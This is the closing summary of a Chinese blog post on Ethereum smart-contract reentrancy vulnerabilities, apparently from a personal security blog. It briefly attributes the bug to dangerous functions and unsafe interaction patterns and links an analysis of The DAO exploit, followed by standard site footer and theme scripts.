<h1 id="0x06-总结"><a href="#0x06-总结" class="headerlink" title="0x06 总结"></a>0x06 总结</h1><p>合约在开发过程中，使用了危险的函数，并且使用不安全的交互模式。两者叠加在一起造就了以太坊非常经典的重入漏洞。其中最有代表性的攻击 The Dao<br>分析报告：<a target="_blank" rel="noopener" href="https://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/">Analysis of the DAO exploit</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Zpano
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://zpano.cn/2021/07/22/22/" title="深入智能合约重入漏洞">https://zpano.cn/2021/07/22/22/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/" rel="tag"># 区块链安全</a>
              <a href="/tags/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6%E5%AE%89%E5%85%A8/" rel="tag"># 智能合约安全</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/07/21/21/" rel="prev" title="浅谈智能合约evilReflex漏洞">
                  <i class="fa fa-chevron-left"></i> 浅谈智能合约evilReflex漏洞
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/07/29/23/" rel="next" title="如何连接以太坊，并与之交互">
                  如何连接以太坊，并与之交互 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zpano</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">222k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">3:22</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/local-search.js"></script>















  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>








  

  
      <script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              const target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    const script = document.createElement('script');
    script.src = '//cdn.jsdelivr.net/npm/mathjax@3.1.2/es5/tex-mml-chtml.js';
    script.defer = true;
    document.head.appendChild(script);
  } else {
    MathJax.startup.document.state(0);
    MathJax.typesetClear();
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

</body>
</html>
